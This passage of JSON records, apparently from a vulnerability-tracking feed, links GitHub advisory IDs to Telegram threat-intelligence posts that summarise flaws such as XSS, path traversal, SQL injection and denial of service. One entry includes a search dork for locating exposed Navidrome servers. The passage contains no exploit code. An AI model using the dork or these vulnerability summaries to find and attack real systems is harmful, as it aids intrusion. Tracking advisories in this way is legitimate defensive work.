website the ability to run code. If wrangler dev --remote was being used, an attacker could access production resources if they were bound to the worker.\n\nGHSS: 9.3", "creation_timestamp": "2024-01-05T17:03:23.000000Z"}, {"uuid": "1691be0d-252b-4d31-ba84-75d01432fd37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-264P-99WQ-F4J6", "type": "seen", "source": "https://t.me/arpsyndicate/2491", "content": "#ExploitObserverAlert\n\nGHSA-264p-99wq-f4j6\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-264P-99WQ-F4J6. A potential denial-of-service issue exists in\u00a0ion-java\u00a0for applications that use\u00a0ion-java\u00a0to:\n\nGHSS: 7.5", "creation_timestamp": "2024-01-05T16:20:12.000000Z"}, {"uuid": "dc2e09e3-23b6-44c8-a901-9a570a168daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CFPH-4QQH-W828", "type": "seen", "source": "https://t.me/arpsyndicate/2490", "content": "#ExploitObserverAlert\n\nGHSA-cfph-4qqh-w828\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-CFPH-4QQH-W828. Sending specially crafted HTTP requests and inspector messages to Wrangler's dev server could result in any file on the user's computer being accessible over the local network. An attacker that could trick any user on the local network into opening a malicious website could also read any file.\n\nGHSS: 6.9", "creation_timestamp": "2024-01-05T15:49:32.000000Z"}, {"uuid": "7b7bf6a6-7c36-4825-9921-01c957979d39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8P37-W86W-447Q", "type": "seen", "source": "https://t.me/arpsyndicate/3002", "content": "#ExploitObserverAlert\n\nGHSA-8p37-w86w-447q\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-8P37-W86W-447Q. The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", "creation_timestamp": "2024-01-26T16:37:17.000000Z"}, {"uuid": "3740c3a2-3583-40ae-bafe-ef0d4629eb22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W97F-6VH7-H454", "type": "seen", "source": "https://t.me/arpsyndicate/2917", "content": "#ExploitObserverAlert\n\nGHSA-w97f-6vh7-h454\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-W97F-6VH7-H454. A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.\n\nGHSS: 7.5", "creation_timestamp": "2024-01-19T10:06:57.000000Z"}, {"uuid": "bc24ab55-6062-44b0-9c09-ee0830afd998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GQ2-M628-33XP", "type": "seen", "source": "https://t.me/arpsyndicate/4940", "content": "#ExploitObserverAlert\n\nGHSA-2gq2-m628-33xp\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-2gq2-m628-33xp. gregwar/rst Local File Inclusion Vulnerability\n\nARPS-PRIORITY: 0.759637", "creation_timestamp": "2024-05-17T21:26:25.000000Z"}, {"uuid": "d386bd3f-f247-4e1a-ab90-ad4da8209fd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J84-H9RR-927M", "type": "seen", "source": "https://t.me/arpsyndicate/3001", "content": "#ExploitObserverAlert\n\nGHSA-9j84-h9rr-927m\n\nDESCRIPTION: Exploit Observer has 4 entries in 2 file formats related to GHSA-9J84-H9RR-927M. Uncontrolled search path in the QT Library before 5.14.0, 5.12.7 and 5.9.10 may allow an authenticated user to potentially enable elevation of privilege via local access.", "creation_timestamp": "2024-01-26T16:31:48.000000Z"}, {"uuid": "b6984061-17ef-4a07-825c-c2e5d1c798bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-875G-MFP6-G7F9", "type": "seen", "source": "https://t.me/arpsyndicate/2886", "content": "#ExploitObserverAlert\n\nGHSA-875g-mfp6-g7f9\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-875G-MFP6-G7F9. An issue was discovered in the FamStructWrapper::deserialize implementation provided by the crate for vmm_sys_util::fam::FamStructWrapper, which can lead to out of bounds memory accesses. The deserialization does not check that the length stored in the header matches the flexible array length. Mismatch in the lengths might allow out of bounds memory access through Rust-safe methods.\n\nGHSS: 5.7", "creation_timestamp": "2024-01-16T22:50:09.000000Z"}, {"uuid": "45f6a658-89ff-49c1-8c00-4b651b01cf99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M5P-5W5W-3JCF", "type": "seen", "source": "https://t.me/arpsyndicate/2969", "content": "#ExploitObserverAlert\n\nGHSA-4m5p-5w5w-3jcf\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-4M5P-5W5W-3JCF. All id-providers using lib-auth login method. lib-auth should invalidate old session after login and replicate session attributes in a new one, however this is not the behavior in affected versions.", "creation_timestamp": "2024-01-21T09:53:54.000000Z"}, {"uuid": "d6db1043-ecc7-4140-af7b-e7d35fd913c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWCJ-7JJP-4W38", "type": "seen", "source": "https://t.me/arpsyndicate/4982", "content": "#ARPSReleaseAlert\n\nPuncia v0.21 has been released. \n- Fixed a security issue: GHSA-rwcj-7jjp-4w38\n\nThe Panthera(P.)uncia of Cybersecurity - Official CLI utility for Subdomain Center &amp; Exploit Observer.\nhttps://github.com/ARPSyndicate/puncia", "creation_timestamp": "2024-07-20T14:49:54.000000Z"}, {"uuid": "0f109bc6-d06d-4f9d-96ac-b71014a238ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85RF-XH54-WHP3", "type": "seen", "source": "https://t.me/arpsyndicate/2963", "content": "#ExploitObserverAlert\n\nGHSA-85rf-xh54-whp3\n\nDESCRIPTION: Exploit Observer has 3 entries in 2 file formats related to GHSA-85RF-XH54-WHP3. A path traversal vulnerability was detected in iodine's static file service. This vulnerability effects any application running iodine's static file server on an effected iodine version.", "creation_timestamp": "2024-01-20T14:52:08.000000Z"}, {"uuid": "6eec31ba-8e0e-4be6-a759-56662becddd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62JR-84GF-WMG4", "type": "seen", "source": "https://t.me/arpsyndicate/2938", "content": "#ExploitObserverAlert\n\nGHSA-62jr-84gf-wmg4\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-62JR-84GF-WMG4. The default configuration of fastify/swagger-ui without baseDir set will lead to all files in the module's directory being exposed via http routes served by the module.\n\nGHSS: 5.3", "creation_timestamp": "2024-01-19T16:57:24.000000Z"}, {"uuid": "3b7d1a1f-d9a7-4413-af3c-b5ee123c4c49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W7JX-J77M-WP65", "type": "seen", "source": "https://t.me/arpsyndicate/2541", "content": "#ExploitObserverAlert\n\nGHSA-w7jx-j77m-wp65\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-W7JX-J77M-WP65. A cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs. This impacts all users who are using TinyMCE 5.5.1 or lower.", "creation_timestamp": "2024-01-06T13:27:18.000000Z"}, {"uuid": "dcc65e84-3a84-4955-b865-bf81ec05db5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5PQ7-52MG-HR42", "type": "seen", "source": "https://t.me/arpsyndicate/2536", "content": "#ExploitObserverAlert\n\nGHSA-5pq7-52mg-hr42\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-5PQ7-52MG-HR42. I found \"multipart/form-data request tampering vulnerability\" caused by Content-Disposition \"filename\" lack of escaping in httparty.\n\nGHSS: 6.5", "creation_timestamp": "2024-01-06T12:47:10.000000Z"}, {"uuid": "e9e6daa9-252c-4f08-bdec-3a6a3ce1aab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X6F-956F-Q43W", "type": "seen", "source": "https://t.me/arpsyndicate/2526", "content": "#ExploitObserverAlert\n\nGHSA-8x6f-956f-q43w\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-8X6F-956F-Q43W. There is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the preserveComments directive must be enabled in your policy file and also allow for certain tags at the same time. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output.\n\nGHSS: 6.1", "creation_timestamp": "2024-01-05T21:17:30.000000Z"}, {"uuid": "caf45a13-f555-4580-8e43-a1661396939d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XGPM-Q3MQ-46RQ", "type": "seen", "source": "https://t.me/arpsyndicate/2521", "content": "#ExploitObserverAlert\n\nGHSA-xgpm-q3mq-46rq\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-XGPM-Q3MQ-46RQ. Some event attributes are not detected by the isCleanHTML method\n\nGHSS: 8.1", "creation_timestamp": "2024-01-05T20:45:32.000000Z"}, {"uuid": "d472bc3d-2dd9-44a7-a825-1fd1410a16c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8JP-2QGX-V4HF", "type": "seen", "source": "https://t.me/arpsyndicate/2245", "content": "#ExploitObserverAlert\n\nGHSA-f8jp-2qgx-v4hf\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-F8JP-2QGX-V4HF. Transient DOS in Modem while allocating DSM items.\n\nGHSS: 7.5", "creation_timestamp": "2023-12-29T11:50:05.000000Z"}, {"uuid": "e87d80a9-f011-4d2e-93d3-936ee62562cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F7X7-CW3Q-5RM9", "type": "seen", "source": "https://t.me/arpsyndicate/3184", "content": "#ExploitObserverAlert\n\nGHSA-f7x7-cw3q-5rm9\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-f7x7-cw3q-5rm9. Use after free in Passwords in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via specific UI interaction. (Chromium security severity: Medium)", "creation_timestamp": "2024-01-28T03:30:49.000000Z"}, {"uuid": "cdaa5a7a-6441-4e6e-8308-88e10365f85f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PPXX-5M9H-6VXF", "type": "seen", "source": "https://t.me/arpsyndicate/2947", "content": "#ExploitObserverAlert\n\nGHSA-ppxx-5m9h-6vxf\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-PPXX-5M9H-6VXF. An attacker can cause its peer to run out of memory sending a large number of PATH_CHALLENGE frames. The receiver is supposed to respond to each PATH_CHALLENGE frame with a PATH_RESPONSE frame. The attacker can prevent the receiver from sending out (the vast majority of) these PATH_RESPONSE frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate.\n\nGHSS: 6.4", "creation_timestamp": "2024-01-19T18:05:27.000000Z"}, {"uuid": "c6f312af-a63c-4640-9b43-1997d2fc6e61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P238-VXC7-2PWQ", "type": "seen", "source": "https://t.me/ctinow/52968", "content": "[GHSA-p238-vxc7-2pwq] Malware in inv-cyber-core\n\nhttps://ift.tt/EG0beaB", "creation_timestamp": "2022-06-01T11:41:53.000000Z"}, {"uuid": "dd858348-7d6b-436f-9c1d-670479483f4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2299", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "1ab29541-a7db-4829-8f49-36175c0219ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2302", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "c812080a-4ee0-45be-bbdd-b48246ad02a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/VWo2h8AbxPmyxGxPyU52gds0kEQ-BSb2QOV1f7kqaK5d0A4", "content": "", "creation_timestamp": "2024-04-05T21:43:54.000000Z"}, {"uuid": "fcf759a3-40d7-4160-85bd-1cff20391b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/2690", "content": "#exploit\n1. SSHNuke Exploit\nhttps://blog.doyensec.com/2025/03/04/exploitable-sshd.html\n\n2. CVE-2024-43639:\nRCE in Microsoft Windows KDC Proxy\nhttps://www.zerodayinitiative.com/blog/2025/3/3/cve-2024-43639\n\n3. Private key extraction in ECDSA upon signing a malformed input\u00a0\nhttps://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh", "creation_timestamp": "2025-03-07T05:49:31.000000Z"}, {"uuid": "6bf50acb-baff-45ab-af54-e05a357eb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QCG2-98H8-485J", "type": "seen", "source": "https://t.me/TheDarkWebInformer/10218", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-qcg2-98h8-485j\n\ud83d\udd17 Aliases: CVE-2024-8474\n\ud83d\udd39 Details: OpenVPN Connect before version 3.5.0 can contain the configuration profile's clear-text private key which is logged in the application log, which an unauthorized actor can use to decrypt the VPN traffic\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:31:00Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T15:31:00Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-212\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-844\n2. https://openvpn.net/connect-docs/android-release-notes.html", "creation_timestamp": "2025-01-10T04:23:05.000000Z"}, {"uuid": "eeef22ca-31c6-46ed-94be-f39ef0242d9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCG8-G69V-X23J", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/10097", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-21616\n\ud83d\udd39 Description: Plane is an open-source project management tool. A cross-site scripting (XSS) vulnerability has been identified in Plane versions prior to 0.23. The vulnerability allows authenticated users to upload SVG files containing malicious JavaScript code as profile images, which gets executed in victims' browsers when viewing the profile image.\n\ud83d\udccf Published: 2025-01-06T21:22:24.129Z\n\ud83d\udccf Modified: 2025-01-06T21:22:24.129Z\n\ud83d\udd17 References:\n1. https://github.com/makeplane/plane/security/advisories/GHSA-rcg8-g69v-x23j", "creation_timestamp": "2025-01-06T22:36:29.000000Z"}, {"uuid": "72b0d795-a6d7-4498-a4aa-636bc068e41e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H53W-7QW7-VH5C", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/10095", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34232\n\ud83d\udd39 Description: snowflake-connector-nodejs, a NodeJS driver for Snowflake, is vulnerable to command injection via single sign on (SSO) browser URL authentication in versions prior to 1.6.21. In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user\u2019s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. Version 1.6.21 contains a patch for this issue.\n\ud83d\udccf Published: 2023-06-08T20:17:49.734Z\n\ud83d\udccf Modified: 2025-01-06T20:19:54.764Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-h53w-7qw7-vh5c\n2. https://github.com/snowflakedb/snowflake-connector-nodejs/pull/465\n3. https://github.com/snowflakedb/snowflake-connector-nodejs/commit/0c9622ae12cd7d627df404b73a783b4a5f60728a\n4. https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes", "creation_timestamp": "2025-01-06T21:50:12.000000Z"}, {"uuid": "d9a1bab0-b644-44bd-ba5e-c958b9475236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "seen", "source": "https://t.me/GarudaSecID/2606", "content": "CVE-2024-47062: SQL Injection dan Auth Bypass di Navidrome Music Server, rating 9.4 \ud83d\udd25\n\nPemberitahuan terbaru mengungkapkan beberapa kerentanan, yang secara teori memungkinkan penyerang untuk mendapatkan akses ke data sensitif.\n\nCari di Netlas.io: \n\ud83d\udc49 Link: https://nt.ls/N9Jj8 \n\ud83d\udc49 Dork: http.description:\"Navidrome Music Server\"\n\nPemberitahuan vendor: https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6", "creation_timestamp": "2024-10-08T13:35:25.000000Z"}, {"uuid": "a3320da3-a28b-4086-bd4d-af59699ee15a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/fzHn0ebqNr3Xz7uVET6h6k_c0r5fv7H30uJ7EYStbABLkxY", "content": "", "creation_timestamp": "2024-04-07T21:44:38.000000Z"}, {"uuid": "7cc34dfe-9334-4ea2-92ed-5ae96335b750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "Telegram/gry8yapGlnw-_PuwRwUbmhmR8DlL77eCnsgxUGNwaSEGQQU", "content": "", "creation_timestamp": "2024-04-05T23:16:32.000000Z"}, {"uuid": "200d5084-24b8-4948-b7f5-31a10ac09751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVJ9-4P6C-C3XM", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3046", "content": "#ExploitObserverAlert\n\nGHSA-xvj9-4p6c-c3xm\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-XVJ9-4P6C-C3XM. Dynamics Finance and Operations Cross-site Scripting Vulnerability", "creation_timestamp": "2024-01-26T19:30:19.000000Z"}, {"uuid": "e61ee46f-6377-4549-b0f0-7c85bd22a903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GVPG-VGMX-XG6W", "type": "seen", "source": "https://t.me/arpsyndicate/4232", "content": "#ExploitObserverAlert\n\nGHSA-gvpg-vgmx-xg6w\n\nDESCRIPTION: Exploit Observer has 8 entries in 3 file formats related to GHSA-gvpg-vgmx-xg6w. Denial of Service in Connect2id Nimbus JOSE+JWT", "creation_timestamp": "2024-03-16T02:07:13.000000Z"}, {"uuid": "052c3d5b-5a97-4348-a7d7-01af2d2096c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R3F-844C-MC37", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4211", "content": "#ExploitObserverAlert\n\nGHSA-8r3f-844c-mc37\n\nDESCRIPTION: Exploit Observer has 9 entries in 3 file formats related to GHSA-8r3f-844c-mc37. Golang protojson.Unmarshal function infinite loop when unmarshaling certain forms of invalid JSON", "creation_timestamp": "2024-03-14T20:25:39.000000Z"}, {"uuid": "799e5be7-b33d-4056-aa76-a9e3e1b48c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JX3-FX5F-R2C6", "type": "seen", "source": "https://t.me/arpsyndicate/4187", "content": "#ExploitObserverAlert\n\nGHSA-2jx3-fx5f-r2c6\n\nDESCRIPTION: Exploit Observer has 6 entries in 2 file formats related to GHSA-2jx3-fx5f-r2c6.", "creation_timestamp": "2024-03-13T08:46:54.000000Z"}, {"uuid": "3834fe96-3511-46c2-a85f-782045104689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2CV-7J58-RFMJ", "type": "seen", "source": "https://t.me/arpsyndicate/4075", "content": "#ExploitObserverAlert\n\nGHSA-q2cv-7j58-rfmj\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-q2cv-7j58-rfmj. Liferay Portal Document and Media widget and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T22:22:53.000000Z"}, {"uuid": "2df50407-247c-424c-9099-e6573d995651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JW44-4F3J-Q396", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4123", "content": "#ExploitObserverAlert\n\nGHSA-jw44-4f3j-q396\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-jw44-4f3j-q396. Helm shows secrets in clear text", "creation_timestamp": "2024-03-06T16:22:38.000000Z"}, {"uuid": "754078cf-3fc0-4751-8fb4-433beed1a9f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VG9-X38G-9HFX", "type": "seen", "source": "https://t.me/arpsyndicate/4117", "content": "#ExploitObserverAlert\n\nGHSA-9vg9-x38g-9hfx\n\nDESCRIPTION: Exploit Observer has 8 entries in 4 file formats related to GHSA-9vg9-x38g-9hfx. Jenkins allows attackers to determine whether a user exists", "creation_timestamp": "2024-03-06T15:50:59.000000Z"}, {"uuid": "3d111c10-b8d3-409c-bebe-40e0e410b23a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWXC-4CMW-7X75", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4028", "content": "#ExploitObserverAlert\n\nGHSA-rwxc-4cmw-7x75\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-rwxc-4cmw-7x75. Liferay Portal and Liferay DXP vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-02-22T20:06:16.000000Z"}, {"uuid": "91c71bca-a6b6-4f12-bebc-6767e344e07c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H59X-P739-982C", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/4145", "content": "#ExploitObserverAlert\n\nGHSA-h59x-p739-982c\n\nDESCRIPTION: Exploit Observer has 8 entries in 3 file formats related to GHSA-h59x-p739-982c. LangChain directory traversal vulnerability", "creation_timestamp": "2024-03-08T02:14:56.000000Z"}, {"uuid": "2c3fd733-cf0e-4c41-b0f7-3996db03d691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHHH-MXJ4-R289", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3341", "content": "#ExploitObserverAlert\n\nGHSA-jhhh-mxj4-r289\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-jhhh-mxj4-r289. Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.", "creation_timestamp": "2024-01-29T10:20:58.000000Z"}, {"uuid": "8d8c6069-c41a-4a69-8a58-78d090694c1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JXFV-M3F6-CH5R", "type": "seen", "source": "https://t.me/arpsyndicate/3317", "content": "#ExploitObserverAlert\n\nGHSA-jxfv-m3f6-ch5r\n\nDESCRIPTION: Exploit Observer has 5 entries in 2 file formats related to GHSA-jxfv-m3f6-ch5r. Incorrect security UI in Payments in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially spoof security UI via a crafted HTML page. (Chromium security severity: Medium)", "creation_timestamp": "2024-01-29T09:24:31.000000Z"}, {"uuid": "f93f60e2-8557-4d0d-8f0d-323d21340e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6QC-PM8W-2WMG", "type": "seen", "source": "https://t.me/arpsyndicate/3316", "content": "#ExploitObserverAlert\n\nGHSA-c6qc-pm8w-2wmg\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-c6qc-pm8w-2wmg. In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file.", "creation_timestamp": "2024-01-29T09:22:32.000000Z"}, {"uuid": "26f1b92e-99ae-48c9-af5d-81b5ddaa6f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3JCF-XPXJ-7444", "type": "seen", "source": "https://t.me/arpsyndicate/3278", "content": "#ExploitObserverAlert\n\nGHSA-3jcf-xpxj-7444\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-3jcf-xpxj-7444. A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.", "creation_timestamp": "2024-01-28T11:15:00.000000Z"}, {"uuid": "a78e12f7-593a-4893-8772-b82afa69ac84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 